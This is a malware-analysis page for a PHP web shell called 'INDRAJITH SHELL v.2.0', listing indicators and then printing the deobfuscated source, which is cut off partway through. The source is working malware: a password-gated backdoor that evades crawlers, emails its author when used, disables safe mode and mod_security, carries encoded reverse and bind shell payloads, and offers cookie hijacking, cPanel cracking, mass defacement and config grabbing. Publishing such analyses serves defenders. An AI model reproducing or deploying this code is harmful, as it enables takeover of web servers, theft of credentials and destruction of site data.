PHP Malware Analysis
mndry.php
md5: b55f5aa0d9948b5214aac73783d51de3
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- ajithkp560_mail_bomb@fbi.gov (Deobfuscated, Original)
- ajithkp560@fbi.gov (Deobfuscated, Original)
- ajithkp560@gmail.com (Deobfuscated, Original, Traces)
- ajithkp560@yahoo.com (Deobfuscated, Original)
- indrajith@shell.com (Deobfuscated, Original)
- rand@whitewhitehouse.gov (Original)
Encoding
- base64_decode (Deobfuscated, Original)
- base64_encode (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original)
- php_uname (Deobfuscated, Original)
- phpinfo (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original)
Execution
- eval (Deobfuscated, Original)
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- proc_open (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- INDRAJITH SHELL v.2.0 (HTML)
URLs
- ftp.ajithkp.org (Deobfuscated, Original)
- ftp.google.com (Deobfuscated, Original)
- ftp.r00t.com (Deobfuscated, Original)
- http://$host (Original)
- http://code.jquery.com/jquery-latest.js (Deobfuscated, Original)
- http://facebook.com/ajithkp560 (Deobfuscated, Original)
- http://www (Deobfuscated, Original)
- http://www.ajithkp560.hostei.com/images/background.gif (Deobfuscated, HTML, Original)
- http://www.ajithkp560.hostei.com/php/ (Deobfuscated, Original)
- http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description= (Deobfuscated, Original)
- http://www.facebook.com/vishnunathkp (Deobfuscated, Original)
Deobfuscated PHP code
<?php
/*
* Indrajith Mini Shell v.2.0 with additional features....
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/
/*------------------ LOGIN -------------------*/
$username = "ajithkp560";
$password = "ajithkp560";
$email = "ajithkp560@gmail.com";
/*------------------ Login Data End ----------*/
@error_reporting(4);
/*------------------ Anti Crawler ------------*/
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />";
echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
echo "<style>\r\n html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }\r\n #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\r\n input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }\r\n loginbox td { border-radius:5px; font-size:11px; }\r\n .header { size:25px; color:green; }\r\n h1 { font-family:DigifaceWide; color:green; font-size:200%; }\r\n h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }\r\n .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}\r\n .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }\r\n hr { border:1px solid #222222; }\r\n #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }\r\n #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }\r\n #meunlist li { margin: 0px; padding: 0px; display: inline; }\r\n #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }\r\n #meunlist a:hover { background: #333; color:green; }\r\n .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }\r\n .menu { font-size:25px; color: }\r\n .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }\r\n .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }\r\n .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}\r\n #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}\r\n .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }\r\n .table a{ text-decoration:none; color:green; font-size:15px; }\r\n .table a:hover{text-decoration:underline;}\r\n .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }\r\n .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }\r\n .table tr:hover{ background:#181818; }\r\n .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }\r\n .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }\r\n .tbl a:hover{text-decoration:underline;}\r\n .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }\r\n .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }\r\n .tbl td:hover{ background:#181818; }\r\n #alert {position: relative;}\r\n #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}\r\n #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}\r\n #alert:target {display: none;}\r\n .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}\r\n .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}\r\n @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}\r\n </style>";
if ($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password)) {
if ($_POST["usrname"] == $username && $_POST["passwrd"] == $password) {
print '<script>document.cookie="user=' . $_POST["usrname"] . ';";document.cookie="pass=' . md5($_POST["passwrd"]) . ';";</script>';
if ($email != "") {
mail_alert();
}
} else {
if ($_POST['usrname']) {
print "<script>alert(\"Sorry... Wrong UserName/PassWord\");</script>";
}
echo "<title>INDRAJITH SHELL v.2.0</title><center>\r\n <div id=loginbox><p><font face=\"verdana,arial\" size=-1>\r\n <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>\r\n <center><table cellpadding='2' cellspacing='0' border='0' id='ap_table'>\r\n <tr><td bgcolor=\"green\"><table cellpadding='0' cellspacing='0' border='0' width='100%'><tr><td bgcolor=\"green\" align=center style=\"padding:2;padding-bottom:4\"><b><font color=\"white\" size=-1 color=\"white\" face=\"verdana,arial\"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>\r\n <tr><td bgcolor=\"black\" style=\"padding:5\">\r\n <form method=\"post\">\r\n <input type=\"hidden\" name=\"action\" value=\"login\">\r\n <input type=\"hidden\" name=\"hide\" value=\"\">\r\n <center><table>\r\n <tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Login:</font></td><td><input type=\"text\" size=\"30\" name=\"usrname\" value=\"username\" onfocus=\"if (this.value == 'username'){this.value = '';}\"></td></tr>\r\n <tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Password:</font></td><td><input type=\"password\" size=\"30\" name=\"passwrd\" value=\"password\" onfocus=\"if (this.value == 'password') this.value = '';\"></td></tr>\r\n <tr><td><font face=\"verdana,arial\" size=-1> </font></td><td><font face=\"verdana,arial\" size=-1><input type=\"submit\" value=\"Enter\"></font></td></tr></table>\r\n </div><br /></center>";
exit;
}
}
$color_g = "green";
$color_b = "4C83AF";
$color_bg = "#111111";
$color_hr = "#222";
$color_wri = "green";
$color_rea = "yellow";
$color_non = "red";
$path = $_GET['path'];
@session_start();
@set_time_limit(0);
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ignore_user_abort(FALSE);
@ini_set('zlib.output_compression', 'Off');
$sep = "/";
if (strtolower("PHP") == "win") {
$os = "win";
$sep = "\\";
$ox = "Windows";
} else {
$os = "nix";
$ox = "Linux";
}
$self = $_SERVER['PHP_SELF'];
$srvr_sof = $_SERVER['SERVER_SOFTWARE'];
$your_ip = $_SERVER['REMOTE_ADDR'];
$srvr_ip = $_SERVER['SERVER_ADDR'];
$admin = $_SERVER['SERVER_ADMIN'];
$s_php_ini = "safe_mode=OFF\r\ndisable_functions=NONE";
$ini_php = "<?php \r\necho ini_get(\"safe_mode\");\r\necho ini_get(\"open_basedir\");\r\ninclude(\$_GET[\"file\"]);\r\nini_restore(\"safe_mode\");\r\nini_restore(\"open_basedir\");\r\necho ini_get(\"safe_mode\");\r\necho ini_get(\"open_basedir\");\r\ninclude(\$_GET[\"ss\"]);\r\n?>";
$s_htaccess = "<IfModule mod_security.c>\r\nSec------Engine Off\r\nSec------ScanPOST Off\r\n</IfModule>";
$s_htaccess_pl = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-cgi .sh\r\nAddHandler cgi-script .pl\r\nAddHandler cgi-script .pl";
$sym_htaccess = "Options all\r\nDirectoryIndex Sux.html\r\nAddType text/plain .php\r\nAddHandler server-parsed .php\r\nAddType text/plain .html\r\nAddHandler txt .html\r\nRequire None\r\nSatisfy Any";
$sym_php_ini = "safe_mode=OFF\r\ndisable_functions=NONE";
$forbid_dir = "Options -Indexes";
$cookie_highjacker = "rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
$bind_perl = "rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
/*----------------------- Top Menu ------------------------------------------*/
if ($safemode == "On") {
echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
} else {
echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
}
echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>\$(\"#alert\").delay(2000).fadeOut(300);</script>";
echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>\r\n<table>\r\n <tbody>\r\n <tr>\r\n <td style='border-right:1px solid #104E8B;' width=\"300px;\">\r\n <div style='text-align:center;'>\r\n <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>\r\n </div>\r\n </td>\r\n <td>\r\n <div class=\"header\">OS</font> <font color=\"#666\" >:</font>\r\n " . $ox . " </font> <font color=\"#666\" >|</font> " . php_uname() . "<br />\r\n Your IP : <font color=red>" . $your_ip . "</font> <font color=\"#666\" >|</font> Server IP : <font color=red>" . $srvr_ip . "</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />\r\n MySQL <font color=\"#666\" > : </font>";
echo mysqlx();
echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>";
echo oraclesx();
echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>";
echo mssqlx();
echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";
echo postgreyx();
echo "<br />cURL <font color=\"#666\" > : </font>";
echo curlx();
echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>";
echo disc_size();
echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>";
echo freesize();
echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>" . phpversion() . "</a>\r\n <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";
echo disabled_functns() . "</font><br />";
if ($os == 'win') {
echo "Drives <font color=\"#666\" > : </font>";
echo drivesx();
} else {
echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>";
echo r00t_exploit() . "</font>";
}
echo "\r\n </div>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table></div>";
echo "<div class='menubar'> <div id=\"meunlist\">\r\n<ul>\r\n<li><a href=\"?\">HOME</a></li>\r\n<li><a href=\"?symlink\">SymLink</a></li>\r\n<li><a href=\"?rs\">((( Connect )))</a></li>\r\n<li><a href=\"?cookiejack\">Cookie HighJack</a></li>\r\n<li><a href=\"?encodefile\">PHP Encode/Decode</a></li>\r\n<li><a href=\"?path={$path}&safe_mod\">Safe Mode Fucker</a></li>\r\n<li><a href=\"?path={$path}&forbd_dir\">Directory Listing Forbidden</a></li>\r\n</ul>\r\n<ul>\r\n<li><a href=\"?massmailer\">Mass Mailer</a></li>\r\n<li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>\r\n<li><a href=\"?server_exploit_details\">Exploit Details</a></li>\r\n<li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>\r\n<li><a href=\"?remotefiledown\">Remote File Downloader</a></li>\r\n<li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>\r\n</ul>\r\n<ul>\r\n<li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>\r\n<li><a href=\"?sshman\">SSH Shell</a></li>\r\n<li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>\r\n<li><a href=\"?ftpman\">FTP Manager</a></li>\r\n<li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>\r\n<li><a href=\"?path={$path}&mass_xploit\">Mass Deface</a></li>\r\n<li><a href=\"?config_grab\">Config Grabber</a></li>\r\n<li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>\r\n</ul>\r\n</div></div>";
/*----------------------- End of Top Menu -----------------------------------*/
/*--------------- FUNCTIONS ----------------*/
function alert($alert_txt)
{
echo "<script>alert('" . $alert_txt . "');window.location.href='?';</script>";
}
function disabled_functns()
{
if (!@ini_get('disable_functions')) {
echo "None";
} else {
echo @ini_get('disable_functions');
}
}
function drivesx()
{
foreach (range('A', 'Z') as $drive) {
if (is_dir($drive . ':\\')) {
echo "<a style='color:green; text-decoration:none;' href='?path=" . $drive . ":\\'>[" . $drive . "]</a>";
}
}
}
function mail_alert()
{
global $email, $your_ip;
$shell_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$content_mail = "Hello Master,\n\r\nYour shell in {$shell_path} is accessed by " . $_SERVER['REMOTE_ADDR'] . ". Hope You Enjoy this shell very much.\n\r\nBy Indrajith";
mail($email, "Shell Accessed!!!", $content_mail, "From:indrajith@shell.com");
}
function filesizex($size)
{
if ($size >= 1073741824) {
$size = round($size / 1073741824, 2) . " GB";
} elseif ($size >= 1048576) {
$size = round($size / 1048576, 2) . " MB";
} elseif ($size >= 1024) {
$size = round($size / 1024, 2) . " KB";
} else {
$size .= " B";
}
return $size;
}
function disc_size()
{
echo filesizex(disk_total_space("/"));
}
function freesize()
{
echo filesizex(disk_free_space("/"));
}
function file_perm($filz)
{
if ($m = fileperms($filz)) {
$p = '';
$p .= $m & 0400 ? 'r' : '-';
$p .= $m & 0200 ? 'w' : '-';
$p .= $m & 0100 ? 'x' : '-';
$p .= $m & 040 ? 'r' : '-';
$p .= $m & 020 ? 'w' : '-';
$p .= $m & 010 ? 'x' : '-';
$p .= $m & 04 ? 'r' : '-';
$p .= $m & 02 ? 'w' : '-';
$p .= $m & 01 ? 'x' : '-';
return $p;
} else {
return "?????";
}
}
function mysqlx()
{
if (function_exists('mysql_connect')) {
echo "<font color='red'>Enabled</font>";
} else {
echo "<font color='green'>Disabled</font>";
}
}
function oraclesx()
{
if (function_exists('oci_connect')) {
echo "<font color='red'>Enabled</font>";
} else {
echo "<font color='green'>Disabled</font>";
}
}
function mssqlx()
{
if (function_exists('mssql_connect')) {
echo "<font color='red'>Enabled</font>";
} else {
echo "<font color='green'>Disabled</font>";
}
}
function postgreyx()
{
if (function_exists('pg_connect')) {
echo "<font color='red'>Enabled</font>";
} else {
echo "<font color='green'>Disabled</font>";
}
}
function strip($filx)
{
if (!get_magic_quotes_gpc()) {
return trim(urldecode($filx));
}
return trim(urldecode(stripslashes($filx)));
}
function curlx()
{
if (function_exists('curl_version')) {
echo "<font color='red'>Enabled</font>";
} else {
echo "<font color='green'>Disabled</font>";
}
}
function filesize_x($filex)
{
$f_size = filesizex(filesize($filex));
return $f_size;
}
function rename_ui()
{
$rf_path = $_GET['rename'];
echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=" . $rf_path . ">New Name : <input name='new_name' size='40' value=" . basename($rf_path) . "><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
}
function filemanager_bg()
{
global $sep, $self;
$path = !empty($_GET['path']) ? $_GET['path'] : getcwd();
$dirs = array();
$fils = array();
if (is_dir($path)) {
chdir($path);
if ($handle = opendir($path)) {
while (($item = readdir($handle)) !== FALSE) {
if ($item == ".") {
continue;
}
if ($item == "..") {
continue;
}
if (is_dir($item)) {
array_push($dirs, $path . $sep . $item);
} else {
array_push($fils, $path . $sep . $item);
}
}
} else {
alert("Access Denied for this operation");
}
} else {
alert("Directory Not Found!!!");
}
echo "<div id=result><table class=table>\r\n <tr>\r\n <th width='500px'>Name</th>\r\n <th width='100px'>Size</th>\r\n <th width='100px'>Permissions</th>\r\n <th width='500px'>Actions</th>\r\n </tr>";
foreach ($dirs as $dir) {
echo "<tr><td><a href='{$self}?path={$dir}'>" . basename($dir) . "</a></td>\r\n <td>" . filesize_x($dir) . "</td>\r\n <td><a href='{$self}?path={$path}&perm={$dir}'>" . file_perm($dir) . "</a></td>\r\n <td><a href='{$self}?path={$path}&del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&rename={$dir}'>Rename</a></td></tr>";
}
foreach ($fils as $fil) {
echo "<tr><td><a href='{$self}?path={$path}&read={$fil}'>" . basename($fil) . "</a></td>\r\n <td>" . filesize_x($fil) . "</td>\r\n <td><a href='{$self}?path={$path}&perm={$fil}'>" . file_perm($fil) . "</a></td>\r\n <td><a href='{$self}?path={$path}&del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&copy={$fil}'>Copy</a> </td>";
}
echo "</tr></table></div>";
}
function rename_bg()
{
if (isset($_GET['old_name']) && isset($_GET['new_name'])) {
$o_r_path = basename($_GET['old_name']);
$r_path = str_replace($o_r_path, "", $_GET['old_name']);
$r_new_name = $r_path . $_GET['new_name'];
echo $r_new_name;
if (rename($_GET['old_name'], $r_new_name) == FALSE) {
alert("Access Denied for this action!!!");
} else {
alert("Renamed File Succeessfully");
}
}
}
function edit_file()
{
$path = $_GET['path'];
chdir($path);
$edt_file = $_GET['edit'];
$e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
if ($e_content) {
$o_content = $e_content;
} else {
if (function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
$fd = fopen($edt_file, "rb");
if (!$fd) {
alert("Permission Denied");
} else {
while (!feof($fd)) {
$o_content = wordwrap(htmlspecialchars(fgets($fd)));
}
}
fclose($fd);
}
}
echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=" . $_GET['edit'] . "'>" . basename($_GET['edit']) . "</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=" . $_GET['edit'] . ">\r\n <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>" . $o_content . "</textarea></center><hr />\r\n <input class='input_big' name='save' type='submit' value=' Save ' /><br /><br /><hr /><br /><br /></div>";
}
function edit_file_bg()
{
if (file_exists($_POST['e_file'])) {
$handle = fopen($_POST['e_file'], "w+");
if (!handle) {
alert("Permission Denied");
} else {
fwrite($handle, $_POST['e_content_n']);
alert("Your changes were Successfully Saved!");
}
fclose($handle);
} else {
alert("File Not Found!!!");
}
}
function delete_file()
{
$del_file = $_GET['del_fil'];
if (unlink($del_file) != FALSE) {
alert("Deleted Successfully");
exit;
} else {
alert("Access Denied for this Operation");
exit;
}
}
function deldirs($d_dir)
{
$d_files = glob($d_dir . '*', GLOB_MARK);
foreach ($d_files as $d_file) {
if (is_dir($d_file)) {
deldirs($d_file);
} else {
unlink($d_file);
}
}
if (is_dir($d_dir)) {
if (rmdir($d_dir)) {
alert("Deleted Directory Successfully");
} else {
alert("Access Denied for this Operation");
}
}
}
function code_viewer()
{
$path = $_GET['path'];
$r_file = $_GET['read'];
$r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
if ($r_content) {
$rr_content = $r_content;
} else {
if (function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
$fd = fopen($r_file, "rb");
if (!$fd) {
alert("Permission Denied");
} else {
while (!feof($fd)) {
$rr_content = wordwrap(htmlspecialchars(fgets($fd)));
}
}
fclose($fd);
}
}
echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&edit=" . $_GET['read'] . "'>" . basename($_GET['read']) . "</a></font><br /><br /><hr /><pre><code>" . $rr_content . "</code></pre><br /><br /><hr /><br /><br /></div>";
}
function copy_file_ui()
{
echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=" . $_GET['copy'] . " > To : <input size=40 name='c_target' value=" . $_GET['path'] . $sep . "> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
}
function copy_file_bg()
{
global $sep;
if (function_exists(copy)) {
if (copy($_GET['c_file'], $_GET['c_target'] . $sep . $_GET['cn_name'])) {
alert("Succeded");
} else {
alert("Access Denied");
}
}
}
function ch_perm_bg()
{
if (isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
if (chmod($_GET['p_filex'], $_GET['new_perm']) != FALSE) {
alert("Succeded. Permission Changed!!!");
} else {
alert("Access Denied for This Operation");
}
}
}
function ch_perm_ui()
{
$p_file = $_GET['perm'];
echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=" . getcwd() . " ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0" . substr(sprintf('%o', fileperms($p_file)), -3) . "><input type='submit' value=' >> ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
ch_perm_bg();
}
function mk_file_ui()
{
chdir($_GET['path']);
echo "<div id=result><br /><br /><font color=red><form method='GET'>\r\n <input type='hidden' name='path' value=" . getcwd() . ">\r\n New File Name : <input size='40' name='new_f_name' value=" . $_GET['new_file'] . "></font><br /><br /><hr /><br /><center>\r\n <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />\r\n <input class='input_big' type='submit' value=' Save ' /></form></center></div>";
}
function mk_file_bg()
{
chdir($_GET['path']);
$c_path = $_GET['path'];
$c_file = $_GET['new_f_name'];
$c_file_contents = $_GET['n_file_content'];
$handle = fopen($c_file, "w");
if (!$handle) {
alert("Permission Denied");
} else {
fwrite($handle, $c_file_contents);
alert("Your changes were Successfully Saved!");
}
fclose($handle);
}
function create_dir()
{
chdir($_GET['path']);
$new_dir = $_GET['new_dir'];
if (is_writable($_GET['path'])) {
mkdir($new_dir);
alert("Direcory Created Successfully");
exit;
} else {
alert("Access Denied for this Operation");
exit;
}
}
function cmd($cmd)
{
